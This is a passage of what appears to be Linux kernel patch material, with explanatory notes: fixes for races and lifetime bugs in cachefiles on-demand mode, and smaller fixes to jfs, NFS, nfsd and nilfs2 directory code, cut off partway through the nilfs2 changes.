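Since CACHEFILES_OBJECT_STATE_FUNCS() generates its accessors by token pasting, the call sites read better than the macro itself. For reference, this is what one instantiation expands to (hand-expanded against the patch's own types; not part of the patch):

/* Hand expansion of CACHEFILES_OBJECT_STATE_FUNCS(open, OPEN): */
static inline bool
cachefiles_ondemand_object_is_open(const struct cachefiles_object *object)
{
	return object->ondemand->state == CACHEFILES_ONDEMAND_OBJSTATE_OPEN;
}

static inline void
cachefiles_ondemand_set_object_open(struct cachefiles_object *object)
{
	object->ondemand->state = CACHEFILES_ONDEMAND_OBJSTATE_OPEN;
}
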
+diff --git a/fs/cachefiles/ondemand.c b/fs/cachefiles/ondemand.c
+index 0254ed39f68ce..4b39f0422e590 100644
+--- a/fs/cachefiles/ondemand.c
++++ b/fs/cachefiles/ondemand.c
+@@ -4,26 +4,45 @@
+ #include <linux/uio.h>
+ #include "internal.h"
+ 
++struct ondemand_anon_file {
++	struct file *file;
++	int fd;
++};
++
++static inline void cachefiles_req_put(struct cachefiles_req *req)
++{
++	if (refcount_dec_and_test(&req->ref))
++		kfree(req);
++}
++
+ static int cachefiles_ondemand_fd_release(struct inode *inode,
+ 					  struct file *file)
+ {
+ 	struct cachefiles_object *object = file->private_data;
+-	struct cachefiles_cache *cache = object->volume->cache;
+-	int object_id = object->ondemand_id;
++	struct cachefiles_cache *cache;
++	struct cachefiles_ondemand_info *info;
++	int object_id;
+ 	struct cachefiles_req *req;
+-	XA_STATE(xas, &cache->reqs, 0);
++	XA_STATE(xas, NULL, 0);
+ 
+-	xa_lock(&cache->reqs);
+-	object->ondemand_id = CACHEFILES_ONDEMAND_ID_CLOSED;
++	if (!object)
++		return 0;
+ 
+-	/*
+-	 * Flush all pending READ requests since their completion depends on
+-	 * anon_fd.
+-	 */
+-	xas_for_each(&xas, req, ULONG_MAX) {
++	info = object->ondemand;
++	cache = object->volume->cache;
++	xas.xa = &cache->reqs;
++
++	xa_lock(&cache->reqs);
++	spin_lock(&info->lock);
++	object_id = info->ondemand_id;
++	info->ondemand_id = CACHEFILES_ONDEMAND_ID_CLOSED;
++	cachefiles_ondemand_set_object_close(object);
++	spin_unlock(&info->lock);
++
++	/* Only flush reqs marked CACHEFILES_REQ_NEW to avoid racing with daemon_read */
++	xas_for_each_marked(&xas, req, ULONG_MAX, CACHEFILES_REQ_NEW) {
+ 		if (req->msg.object_id == object_id &&
+-		    req->msg.opcode == CACHEFILES_OP_READ) {
+-			req->error = -EIO;
++		    req->msg.opcode == CACHEFILES_OP_CLOSE) {
+ 			complete(&req->done);
+ 			xas_store(&xas, NULL);
+ 		}
+@@ -118,6 +137,7 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ {
+ 	struct cachefiles_req *req;
+ 	struct fscache_cookie *cookie;
++	struct cachefiles_ondemand_info *info;
+ 	char *pid, *psize;
+ 	unsigned long id;
+ 	long size;
+@@ -168,6 +188,33 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		goto out;
+ 	}
+ 
++	info = req->object->ondemand;
++	spin_lock(&info->lock);
++	/*
++	 * The anonymous fd was closed before copen? Fail the request.
++	 *
++	 *             t1             |             t2
++	 * ---------------------------------------------------------
++	 *                             cachefiles_ondemand_copen
++	 *                             req = xa_erase(&cache->reqs, id)
++	 * // Anon fd is maliciously closed.
++	 * cachefiles_ondemand_fd_release
++	 * xa_lock(&cache->reqs)
++	 * cachefiles_ondemand_set_object_close(object)
++	 * xa_unlock(&cache->reqs)
++	 *                             cachefiles_ondemand_set_object_open
++	 *                             // No one will ever close it again.
++	 * cachefiles_ondemand_daemon_read
++	 * cachefiles_ondemand_select_req
++	 *
++	 * Get a read req whose fd is already closed. The daemon can't
++	 * issue a cread ioctl with a closed fd, and would hang.
++	 */
++	if (info->ondemand_id == CACHEFILES_ONDEMAND_ID_CLOSED) {
++		spin_unlock(&info->lock);
++		req->error = -EBADFD;
++		goto out;
++	}
+ 	cookie = req->object->cookie;
+ 	cookie->object_size = size;
+ 	if (size)
+@@ -176,19 +223,46 @@ int cachefiles_ondemand_copen(struct cachefiles_cache *cache, char *args)
+ 		set_bit(FSCACHE_COOKIE_NO_DATA_TO_READ, &cookie->flags);
+ 	trace_cachefiles_ondemand_copen(req->object, id, size);
+ 
++	cachefiles_ondemand_set_object_open(req->object);
++	spin_unlock(&info->lock);
++	wake_up_all(&cache->daemon_pollwq);
++
+ out:
+ 	complete(&req->done);
+ 	return ret;
+ }
+ 
+-static int cachefiles_ondemand_get_fd(struct cachefiles_req *req)
++int cachefiles_ondemand_restore(struct cachefiles_cache *cache, char *args)
++{
++	struct cachefiles_req *req;
++
++	XA_STATE(xas, &cache->reqs, 0);
++
++	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
++		return -EOPNOTSUPP;
++
++	/*
++	 * Reset the requests to CACHEFILES_REQ_NEW state, so that
++	 * requests that were processed halfway before the user daemon
++	 * crashed can be reprocessed after the recovery.
++	 */
++	xas_lock(&xas);
++	xas_for_each(&xas, req, ULONG_MAX)
++		xas_set_mark(&xas, CACHEFILES_REQ_NEW);
++	xas_unlock(&xas);
++
++	wake_up_all(&cache->daemon_pollwq);
++	return 0;
++}
++
++static int cachefiles_ondemand_get_fd(struct cachefiles_req *req,
++				      struct ondemand_anon_file *anon_file)
+ {
+ 	struct cachefiles_object *object;
+ 	struct cachefiles_cache *cache;
+ 	struct cachefiles_open *load;
+-	struct file *file;
+ 	u32 object_id;
+-	int ret, fd;
++	int ret;
+ 
+ 	object = cachefiles_grab_object(req->object,
+ 			cachefiles_obj_get_ondemand_fd);
+@@ -200,60 +274,114 @@ static int cachefiles_ondemand_get_fd(struct cachefiles_req *req)
+ 	if (ret < 0)
+ 		goto err;
+ 
+-	fd = get_unused_fd_flags(O_WRONLY);
+-	if (fd < 0) {
+-		ret = fd;
++	anon_file->fd = get_unused_fd_flags(O_WRONLY);
++	if (anon_file->fd < 0) {
++		ret = anon_file->fd;
+ 		goto err_free_id;
+ 	}
+ 
+-	file = anon_inode_getfile("[cachefiles]", &cachefiles_ondemand_fd_fops,
+-				  object, O_WRONLY);
+-	if (IS_ERR(file)) {
+-		ret = PTR_ERR(file);
++	anon_file->file = anon_inode_getfile("[cachefiles]",
++				&cachefiles_ondemand_fd_fops, object, O_WRONLY);
++	if (IS_ERR(anon_file->file)) {
++		ret = PTR_ERR(anon_file->file);
+ 		goto err_put_fd;
+ 	}
+ 
+-	file->f_mode |= FMODE_PWRITE | FMODE_LSEEK;
+-	fd_install(fd, file);
++	spin_lock(&object->ondemand->lock);
++	if (object->ondemand->ondemand_id > 0) {
++		spin_unlock(&object->ondemand->lock);
++		/* Pair with check in cachefiles_ondemand_fd_release(). */
++		anon_file->file->private_data = NULL;
++		ret = -EEXIST;
++		goto err_put_file;
++	}
++
++	anon_file->file->f_mode |= FMODE_PWRITE | FMODE_LSEEK;
+ 
+ 	load = (void *)req->msg.data;
+-	load->fd = fd;
+-	req->msg.object_id = object_id;
+-	object->ondemand_id = object_id;
++	load->fd = anon_file->fd;
++	object->ondemand->ondemand_id = object_id;
++	spin_unlock(&object->ondemand->lock);
+ 
+ 	cachefiles_get_unbind_pincount(cache);
+ 	trace_cachefiles_ondemand_open(object, &req->msg, load);
+ 	return 0;
+ 
++err_put_file:
++	fput(anon_file->file);
++	anon_file->file = NULL;
+ err_put_fd:
+-	put_unused_fd(fd);
++	put_unused_fd(anon_file->fd);
++	anon_file->fd = ret;
+ err_free_id:
+ 	xa_erase(&cache->ondemand_ids, object_id);
+ err:
++	spin_lock(&object->ondemand->lock);
++	/* Avoid marking an opened object as closed. */
++	if (object->ondemand->ondemand_id <= 0)
++		cachefiles_ondemand_set_object_close(object);
++	spin_unlock(&object->ondemand->lock);
+ 	cachefiles_put_object(object, cachefiles_obj_put_ondemand_fd);
+ 	return ret;
+ }
+ 
++static void ondemand_object_worker(struct work_struct *work)
++{
++	struct cachefiles_ondemand_info *info =
++		container_of(work, struct cachefiles_ondemand_info, ondemand_work);
++
++	cachefiles_ondemand_init_object(info->object);
++}
++
++/*
++ * If there are any inflight or subsequent READ requests on the
++ * closed object, reopen it.
++ * Skip read requests whose related object is reopening.
++ */
++static struct cachefiles_req *cachefiles_ondemand_select_req(struct xa_state *xas,
++							      unsigned long xa_max)
++{
++	struct cachefiles_req *req;
++	struct cachefiles_object *object;
++	struct cachefiles_ondemand_info *info;
++
++	xas_for_each_marked(xas, req, xa_max, CACHEFILES_REQ_NEW) {
++		if (req->msg.opcode != CACHEFILES_OP_READ)
++			return req;
++		object = req->object;
++		info = object->ondemand;
++		if (cachefiles_ondemand_object_is_close(object)) {
++			cachefiles_ondemand_set_object_reopening(object);
++			queue_work(fscache_wq, &info->ondemand_work);
++			continue;
++		}
++		if (cachefiles_ondemand_object_is_reopening(object))
++			continue;
++		return req;
++	}
++	return NULL;
++}
++
+ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 					char __user *_buffer, size_t buflen)
+ {
+ 	struct cachefiles_req *req;
+ 	struct cachefiles_msg *msg;
+-	unsigned long id = 0;
+ 	size_t n;
+ 	int ret = 0;
++	struct ondemand_anon_file anon_file;
+ 	XA_STATE(xas, &cache->reqs, cache->req_id_next);
+ 
++	xa_lock(&cache->reqs);
+ 	/*
+ 	 * Cyclically search for a request that has not ever been processed,
+ 	 * to prevent requests from being processed repeatedly, and make
+ 	 * request distribution fair.
+ 	 */
+-	xa_lock(&cache->reqs);
+-	req = xas_find_marked(&xas, UINT_MAX, CACHEFILES_REQ_NEW);
++	req = cachefiles_ondemand_select_req(&xas, ULONG_MAX);
+ 	if (!req && cache->req_id_next > 0) {
+ 		xas_set(&xas, 0);
+-		req = xas_find_marked(&xas, cache->req_id_next - 1, CACHEFILES_REQ_NEW);
++		req = cachefiles_ondemand_select_req(&xas, cache->req_id_next - 1);
+ 	}
+ 	if (!req) {
+ 		xa_unlock(&cache->reqs);
+@@ -270,38 +398,45 @@ ssize_t cachefiles_ondemand_daemon_read(struct cachefiles_cache *cache,
+ 
+ 	xas_clear_mark(&xas, CACHEFILES_REQ_NEW);
+ 	cache->req_id_next = xas.xa_index + 1;
++	refcount_inc(&req->ref);
++	cachefiles_grab_object(req->object, cachefiles_obj_get_read_req);
+ 	xa_unlock(&cache->reqs);
+ 
+-	id = xas.xa_index;
+-	msg->msg_id = id;
+-
+ 	if (msg->opcode == CACHEFILES_OP_OPEN) {
+-		ret = cachefiles_ondemand_get_fd(req);
++		ret = cachefiles_ondemand_get_fd(req, &anon_file);
+ 		if (ret)
+-			goto error;
++			goto out;
+ 	}
+ 
+-	if (copy_to_user(_buffer, msg, n) != 0) {
++	msg->msg_id = xas.xa_index;
++	msg->object_id = req->object->ondemand->ondemand_id;
++
++	if (copy_to_user(_buffer, msg, n) != 0)
+ 		ret = -EFAULT;
+-		goto err_put_fd;
+-	}
+ 
+-	/* CLOSE request has no reply */
+-	if (msg->opcode == CACHEFILES_OP_CLOSE) {
+-		xa_erase(&cache->reqs, id);
+-		complete(&req->done);
++	if (msg->opcode == CACHEFILES_OP_OPEN) {
++		if (ret < 0) {
++			fput(anon_file.file);
++			put_unused_fd(anon_file.fd);
++			goto out;
++		}
++		fd_install(anon_file.fd, anon_file.file);
+ 	}
+-
+-	return n;
+-
+-err_put_fd:
+-	if (msg->opcode == CACHEFILES_OP_OPEN)
+-		close_fd(((struct cachefiles_open *)msg->data)->fd);
+-error:
+-	xa_erase(&cache->reqs, id);
+-	req->error = ret;
+-	complete(&req->done);
+-	return ret;
++out:
++	cachefiles_put_object(req->object, cachefiles_obj_put_read_req);
++	/* Remove the request on error; a CLOSE request has no reply. */
++	if (ret || msg->opcode == CACHEFILES_OP_CLOSE) {
++		xas_reset(&xas);
++		xas_lock(&xas);
++		if (xas_load(&xas) == req) {
++			req->error = ret;
++			complete(&req->done);
++			xas_store(&xas, NULL);
++		}
++		xas_unlock(&xas);
++	}
++	cachefiles_req_put(req);
++	return ret ? ret : n;
+ }
+ 
+ typedef int (*init_req_fn)(struct cachefiles_req *req, void *private);
+@@ -313,20 +448,25 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 					void *private)
+ {
+ 	struct cachefiles_cache *cache = object->volume->cache;
+-	struct cachefiles_req *req;
++	struct cachefiles_req *req = NULL;
+ 	XA_STATE(xas, &cache->reqs, 0);
+ 	int ret;
+ 
+ 	if (!test_bit(CACHEFILES_ONDEMAND_MODE, &cache->flags))
+ 		return 0;
+ 
+-	if (test_bit(CACHEFILES_DEAD, &cache->flags))
+-		return -EIO;
++	if (test_bit(CACHEFILES_DEAD, &cache->flags)) {
++		ret = -EIO;
++		goto out;
++	}
+ 
+ 	req = kzalloc(sizeof(*req) + data_len, GFP_KERNEL);
+-	if (!req)
+-		return -ENOMEM;
++	if (!req) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
++	refcount_set(&req->ref, 1);
+ 	req->object = object;
+ 	init_completion(&req->done);
+ 	req->msg.opcode = opcode;
+@@ -363,8 +503,9 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 		/* coupled with the barrier in cachefiles_flush_reqs() */
+ 		smp_mb();
+ 
+-		if (opcode != CACHEFILES_OP_OPEN && object->ondemand_id <= 0) {
+-			WARN_ON_ONCE(object->ondemand_id == 0);
++		if (opcode == CACHEFILES_OP_CLOSE &&
++			!cachefiles_ondemand_object_is_open(object)) {
++			WARN_ON_ONCE(object->ondemand->ondemand_id == 0);
+ 			xas_unlock(&xas);
+ 			ret = -EIO;
+ 			goto out;
+@@ -387,7 +528,15 @@ static int cachefiles_ondemand_send_req(struct cachefiles_object *object,
+ 	wake_up_all(&cache->daemon_pollwq);
+ 	wait_for_completion(&req->done);
+ 	ret = req->error;
++	cachefiles_req_put(req);
++	return ret;
+ out:
++	/* Reset the object to the close state in the error handling path.
++	 * If an error occurs after creating the anonymous fd,
++	 * cachefiles_ondemand_fd_release() will set the object to close.
++	 */
++	if (opcode == CACHEFILES_OP_OPEN)
++		cachefiles_ondemand_set_object_close(object);
+ 	kfree(req);
+ 	return ret;
+ }
+@@ -430,18 +579,10 @@ static int cachefiles_ondemand_init_close_req(struct cachefiles_req *req,
+ 					      void *private)
+ {
+ 	struct cachefiles_object *object = req->object;
+-	int object_id = object->ondemand_id;
+ 
+-	/*
+-	 * It's possible that object id is still 0 if the cookie looking up
+-	 * phase failed before OPEN request has ever been sent. Also avoid
+-	 * sending CLOSE request for CACHEFILES_ONDEMAND_ID_CLOSED, which means
+-	 * anon_fd has already been closed.
+-	 */
+-	if (object_id <= 0)
++	if (!cachefiles_ondemand_object_is_open(object))
+ 		return -ENOENT;
+ 
+-	req->msg.object_id = object_id;
+ 	trace_cachefiles_ondemand_close(object, &req->msg);
+ 	return 0;
+ }
+@@ -457,16 +598,7 @@ static int cachefiles_ondemand_init_read_req(struct cachefiles_req *req,
+ 	struct cachefiles_object *object = req->object;
+ 	struct cachefiles_read *load = (void *)req->msg.data;
+ 	struct cachefiles_read_ctx *read_ctx = private;
+-	int object_id = object->ondemand_id;
+-
+-	/* Stop enqueuing requests when daemon has closed anon_fd. */
+-	if (object_id <= 0) {
+-		WARN_ON_ONCE(object_id == 0);
+-		pr_info_once("READ: anonymous fd closed prematurely.\n");
+-		return -EIO;
+-	}
+ 
+-	req->msg.object_id = object_id;
+ 	load->off = read_ctx->off;
+ 	load->len = read_ctx->len;
+ 	trace_cachefiles_ondemand_read(object, &req->msg, load);
+@@ -479,13 +611,16 @@ int cachefiles_ondemand_init_object(struct cachefiles_object *object)
+ 	struct fscache_volume *volume = object->volume->vcookie;
+ 	size_t volume_key_size, cookie_key_size, data_len;
+ 
++	if (!object->ondemand)
++		return 0;
++
+ 	/*
+ 	 * CacheFiles will firstly check the cache file under the root cache
+ 	 * directory. If the coherency check failed, it will fallback to
+ 	 * creating a new tmpfile as the cache file. Reuse the previously
+ 	 * allocated object ID if any.
+ 	 */
+-	if (object->ondemand_id > 0)
++	if (cachefiles_ondemand_object_is_open(object))
+ 		return 0;
+ 
+ 	volume_key_size = volume->key[0] + 1;
+@@ -503,6 +638,29 @@ void cachefiles_ondemand_clean_object(struct cachefiles_object *object)
+ 			cachefiles_ondemand_init_close_req, NULL);
+ }
+ 
++int cachefiles_ondemand_init_obj_info(struct cachefiles_object *object,
++				struct cachefiles_volume *volume)
++{
++	if (!cachefiles_in_ondemand_mode(volume->cache))
++		return 0;
++
++	object->ondemand = kzalloc(sizeof(struct cachefiles_ondemand_info),
++					GFP_KERNEL);
++	if (!object->ondemand)
++		return -ENOMEM;
++
++	object->ondemand->object = object;
++	spin_lock_init(&object->ondemand->lock);
++	INIT_WORK(&object->ondemand->ondemand_work, ondemand_object_worker);
++	return 0;
++}
++
++void cachefiles_ondemand_deinit_obj_info(struct cachefiles_object *object)
++{
++	kfree(object->ondemand);
++	object->ondemand = NULL;
++}
++
+ int cachefiles_ondemand_read(struct cachefiles_object *object,
+ 			     loff_t pos, size_t len)
+ {
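
The ondemand rework makes struct cachefiles_req reference-counted because two contexts can now drop it independently: the submitting thread in cachefiles_ondemand_send_req() and the daemon-side reader. A minimal sketch of the ownership rule, using C11 atomics in place of the kernel's refcount_t and with all locking omitted:

#include <stdatomic.h>
#include <stdlib.h>

struct req {
	atomic_int ref;		/* one count per context holding the pointer */
	/* ... payload ... */
};

static struct req *req_alloc(void)
{
	struct req *r = calloc(1, sizeof(*r));

	if (r)
		atomic_init(&r->ref, 1);	/* submitter's reference */
	return r;
}

static void req_get(struct req *r)
{
	atomic_fetch_add(&r->ref, 1);
}

static void req_put(struct req *r)
{
	if (atomic_fetch_sub(&r->ref, 1) == 1)
		free(r);	/* last reference gone: either side may free */
}

int main(void)
{
	struct req *r = req_alloc();

	if (!r)
		return 1;
	req_get(r);	/* daemon reader takes its own reference */
	req_put(r);	/* ...and drops it once the msg is copied out */
	req_put(r);	/* submitter's put frees the request */
	return 0;
}
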
+diff --git a/fs/jfs/xattr.c b/fs/jfs/xattr.c
+index f9273f6901c8d..07df16ce80064 100644
+--- a/fs/jfs/xattr.c
++++ b/fs/jfs/xattr.c
+@@ -557,9 +557,11 @@ static int ea_get(struct inode *inode, struct ea_buffer *ea_buf, int min_size)
+ 
+       size_check:
+ 	if (EALIST_SIZE(ea_buf->xattr) != ea_size) {
++		int size = min_t(int, EALIST_SIZE(ea_buf->xattr), ea_size);
++
+ 		printk(KERN_ERR "ea_get: invalid extended attribute\n");
+ 		print_hex_dump(KERN_ERR, "", DUMP_PREFIX_ADDRESS, 16, 1,
+-				     ea_buf->xattr, ea_size, 1);
++				     ea_buf->xattr, size, 1);
+ 		ea_release(inode, ea_buf);
+ 		rc = -EIO;
+ 		goto clean_up;
+diff --git a/fs/nfs/dir.c b/fs/nfs/dir.c
+index f594dac436a7e..a5a4d9422d6ed 100644
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1792,9 +1792,10 @@ __nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags,
+ 		if (parent != READ_ONCE(dentry->d_parent))
+ 			return -ECHILD;
+ 	} else {
+-		/* Wait for unlink to complete */
++		/* Wait for unlink to complete - see unblock_revalidate() */
+ 		wait_var_event(&dentry->d_fsdata,
+-			       dentry->d_fsdata != NFS_FSDATA_BLOCKED);
++			       smp_load_acquire(&dentry->d_fsdata)
++			       != NFS_FSDATA_BLOCKED);
+ 		parent = dget_parent(dentry);
+ 		ret = reval(d_inode(parent), dentry, flags);
+ 		dput(parent);
+@@ -1807,6 +1808,29 @@ static int nfs_lookup_revalidate(struct dentry *dentry, unsigned int flags)
+ 	return __nfs_lookup_revalidate(dentry, flags, nfs_do_lookup_revalidate);
+ }
+ 
++static void block_revalidate(struct dentry *dentry)
++{
++	/* old devname - just in case */
++	kfree(dentry->d_fsdata);
++
++	/* Any new reference that could lead to an open
++	 * will take ->d_lock in lookup_open() -> d_lookup().
++	 * Holding this lock ensures we cannot race with
++	 * __nfs_lookup_revalidate() and removes and need
++	 * for further barriers.
++	 */
++	lockdep_assert_held(&dentry->d_lock);
++
++	dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++}
++
++static void unblock_revalidate(struct dentry *dentry)
++{
++	/* store_release ensures wait_var_event() sees the update */
++	smp_store_release(&dentry->d_fsdata, NULL);
++	wake_up_var(&dentry->d_fsdata);
++}
++
+ /*
+  * A weaker form of d_revalidate for revalidating just the d_inode(dentry)
+  * when we don't really care about the dentry name. This is called when a
+@@ -2489,15 +2513,12 @@ int nfs_unlink(struct inode *dir, struct dentry *dentry)
+ 		spin_unlock(&dentry->d_lock);
+ 		goto out;
+ 	}
+-	/* old devname */
+-	kfree(dentry->d_fsdata);
+-	dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++	block_revalidate(dentry);
+ 
+ 	spin_unlock(&dentry->d_lock);
+ 	error = nfs_safe_remove(dentry);
+ 	nfs_dentry_remove_handle_error(dir, dentry, error);
+-	dentry->d_fsdata = NULL;
+-	wake_up_var(&dentry->d_fsdata);
++	unblock_revalidate(dentry);
+ out:
+ 	trace_nfs_unlink_exit(dir, dentry, error);
+ 	return error;
+@@ -2609,8 +2630,7 @@ nfs_unblock_rename(struct rpc_task *task, struct nfs_renamedata *data)
+ {
+ 	struct dentry *new_dentry = data->new_dentry;
+ 
+-	new_dentry->d_fsdata = NULL;
+-	wake_up_var(&new_dentry->d_fsdata);
++	unblock_revalidate(new_dentry);
+ }
+ 
+ /*
+@@ -2672,11 +2692,6 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 		if (WARN_ON(new_dentry->d_flags & DCACHE_NFSFS_RENAMED) ||
+ 		    WARN_ON(new_dentry->d_fsdata == NFS_FSDATA_BLOCKED))
+ 			goto out;
+-		if (new_dentry->d_fsdata) {
+-			/* old devname */
+-			kfree(new_dentry->d_fsdata);
+-			new_dentry->d_fsdata = NULL;
+-		}
+ 
+ 		spin_lock(&new_dentry->d_lock);
+ 		if (d_count(new_dentry) > 2) {
+@@ -2698,7 +2713,7 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 			new_dentry = dentry;
+ 			new_inode = NULL;
+ 		} else {
+-			new_dentry->d_fsdata = NFS_FSDATA_BLOCKED;
++			block_revalidate(new_dentry);
+ 			must_unblock = true;
+ 			spin_unlock(&new_dentry->d_lock);
+ 		}
+@@ -2710,6 +2725,8 @@ int nfs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 	task = nfs_async_rename(old_dir, new_dir, old_dentry, new_dentry,
+ 				must_unblock ? nfs_unblock_rename : NULL);
+ 	if (IS_ERR(task)) {
++		if (must_unblock)
++			unblock_revalidate(new_dentry);
+ 		error = PTR_ERR(task);
+ 		goto out;
+ 	}
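
The block_revalidate()/unblock_revalidate() helpers above work because the smp_store_release() in the writer pairs with the smp_load_acquire() in the wait_var_event() condition: a waiter that observes d_fsdata leaving the blocked state also observes everything written before it was cleared. A minimal sketch of that pairing, with hypothetical names (struct widget, compute()) and the kernel's wait-var API assumed:

    /* Writer: publish the result with release semantics, then wake. */
    static void widget_unblock(struct widget *w)
    {
        w->result = compute();                 /* plain write ...         */
        smp_store_release(&w->blocked, false); /* ... ordered before this */
        wake_up_var(&w->blocked);
    }

    /* Reader: the acquire pairs with the release above, so once blocked
     * reads false, w->result is guaranteed to be visible too.
     */
    static void widget_wait(struct widget *w)
    {
        wait_var_event(&w->blocked, !smp_load_acquire(&w->blocked));
    }
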
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index bda3050817c90..ec641a8f6604b 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -4009,6 +4009,23 @@ static void test_fs_location_for_trunking(struct nfs4_fs_location *location,
+ 	}
+ }
+ 
++static bool _is_same_nfs4_pathname(struct nfs4_pathname *path1,
++				   struct nfs4_pathname *path2)
++{
++	int i;
++
++	if (path1->ncomponents != path2->ncomponents)
++		return false;
++	for (i = 0; i < path1->ncomponents; i++) {
++		if (path1->components[i].len != path2->components[i].len)
++			return false;
++		if (memcmp(path1->components[i].data, path2->components[i].data,
++				path1->components[i].len))
++			return false;
++	}
++	return true;
++}
++
+ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 				   struct nfs_fh *fhandle)
+ {
+@@ -4042,9 +4059,13 @@ static int _nfs4_discover_trunking(struct nfs_server *server,
+ 	if (status)
+ 		goto out_free_3;
+ 
+-	for (i = 0; i < locations->nlocations; i++)
++	for (i = 0; i < locations->nlocations; i++) {
++		if (!_is_same_nfs4_pathname(&locations->fs_path,
++					&locations->locations[i].rootpath))
++			continue;
+ 		test_fs_location_for_trunking(&locations->locations[i], clp,
+ 					      server);
++	}
+ out_free_3:
+ 	kfree(locations->fattr);
+ out_free_2:
+diff --git a/fs/nfsd/nfsfh.c b/fs/nfsd/nfsfh.c
+index 8c52b6c9d31a2..3a2ad88ae6481 100644
+--- a/fs/nfsd/nfsfh.c
++++ b/fs/nfsd/nfsfh.c
+@@ -569,7 +569,7 @@ fh_compose(struct svc_fh *fhp, struct svc_export *exp, struct dentry *dentry,
+ 		_fh_update(fhp, exp, dentry);
+ 	if (fhp->fh_handle.fh_fileid_type == FILEID_INVALID) {
+ 		fh_put(fhp);
+-		return nfserr_opnotsupp;
++		return nfserr_stale;
+ 	}
+ 
+ 	return 0;
+@@ -595,7 +595,7 @@ fh_update(struct svc_fh *fhp)
+ 
+ 	_fh_update(fhp, fhp->fh_export, dentry);
+ 	if (fhp->fh_handle.fh_fileid_type == FILEID_INVALID)
+-		return nfserr_opnotsupp;
++		return nfserr_stale;
+ 	return 0;
+ out_bad:
+ 	printk(KERN_ERR "fh_update: fh not verified!\n");
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index 760405da852f6..e9668e455a35e 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -186,19 +186,24 @@ static bool nilfs_check_page(struct page *page)
+ 	return false;
+ }
+ 
+-static struct page *nilfs_get_page(struct inode *dir, unsigned long n)
++static void *nilfs_get_page(struct inode *dir, unsigned long n,
++		struct page **pagep)
+ {
+ 	struct address_space *mapping = dir->i_mapping;
+ 	struct page *page = read_mapping_page(mapping, n, NULL);
++	void *kaddr;
+ 
+-	if (!IS_ERR(page)) {
+-		kmap(page);
+-		if (unlikely(!PageChecked(page))) {
+-			if (!nilfs_check_page(page))
+-				goto fail;
+-		}
++	if (IS_ERR(page))
++		return page;
++
++	kaddr = kmap(page);
++	if (unlikely(!PageChecked(page))) {
++		if (!nilfs_check_page(page))
++			goto fail;
+ 	}
+-	return page;
++
++	*pagep = page;
++	return kaddr;
+ 
+ fail:
+ 	nilfs_put_page(page);
+@@ -275,14 +280,14 @@ static int nilfs_readdir(struct file *file, struct dir_context *ctx)
+ 	for ( ; n < npages; n++, offset = 0) {
+ 		char *kaddr, *limit;
+ 		struct nilfs_dir_entry *de;
+-		struct page *page = nilfs_get_page(inode, n);
++		struct page *page;
+ 
+-		if (IS_ERR(page)) {
++		kaddr = nilfs_get_page(inode, n, &page);
++		if (IS_ERR(kaddr)) {
+ 			nilfs_error(sb, "bad page in #%lu", inode->i_ino);
+ 			ctx->pos += PAGE_SIZE - offset;
+ 			return -EIO;
+ 		}
+-		kaddr = page_address(page);
+ 		de = (struct nilfs_dir_entry *)(kaddr + offset);
+ 		limit = kaddr + nilfs_last_byte(inode, n) -
+ 			NILFS_DIR_REC_LEN(1);
+@@ -345,11 +350,9 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 		start = 0;
+ 	n = start;
+ 	do {
+-		char *kaddr;
++		char *kaddr = nilfs_get_page(dir, n, &page);
+ 
+-		page = nilfs_get_page(dir, n);
+-		if (!IS_ERR(page)) {
+-			kaddr = page_address(page);
++		if (!IS_ERR(kaddr)) {
+ 			de = (struct nilfs_dir_entry *)kaddr;
+ 			kaddr += nilfs_last_byte(dir, n) - reclen;
+ 			while ((char *) de <= kaddr) {
+@@ -387,15 +390,11 @@ nilfs_find_entry(struct inode *dir, const struct qstr *qstr,
+ 
+ struct nilfs_dir_entry *nilfs_dotdot(struct inode *dir, struct page **p)
+ {
+-	struct page *page = nilfs_get_page(dir, 0);
+-	struct nilfs_dir_entry *de = NULL;
++	struct nilfs_dir_entry *de = nilfs_get_page(dir, 0, p);
+ 
+-	if (!IS_ERR(page)) {
+-		de = nilfs_next_entry(
+-			(struct nilfs_dir_entry *)page_address(page));
+-		*p = page;
+-	}
+-	return de;
++	if (IS_ERR(de))
++		return NULL;
++	return nilfs_next_entry(de);
+ }
+ 
+ ino_t nilfs_inode_by_name(struct inode *dir, const struct qstr *qstr)
+@@ -459,12 +458,11 @@ int nilfs_add_link(struct dentry *dentry, struct inode *inode)
+ 	for (n = 0; n <= npages; n++) {
+ 		char *dir_end;
+ 
+-		page = nilfs_get_page(dir, n);
+-		err = PTR_ERR(page);
+-		if (IS_ERR(page))
++		kaddr = nilfs_get_page(dir, n, &page);
++		err = PTR_ERR(kaddr);
++		if (IS_ERR(kaddr))
+ 			goto out;
+ 		lock_page(page);
+-		kaddr = page_address(page);
+ 		dir_end = kaddr + nilfs_last_byte(dir, n);
+ 		de = (struct nilfs_dir_entry *)kaddr;
+ 		kaddr += PAGE_SIZE - reclen;
+@@ -627,11 +625,10 @@ int nilfs_empty_dir(struct inode *inode)
+ 		char *kaddr;
+ 		struct nilfs_dir_entry *de;
+ 
+-		page = nilfs_get_page(inode, i);
+-		if (IS_ERR(page))
+-			continue;
++		kaddr = nilfs_get_page(inode, i, &page);
++		if (IS_ERR(kaddr))
++			return 0;
+ 
+-		kaddr = page_address(page);
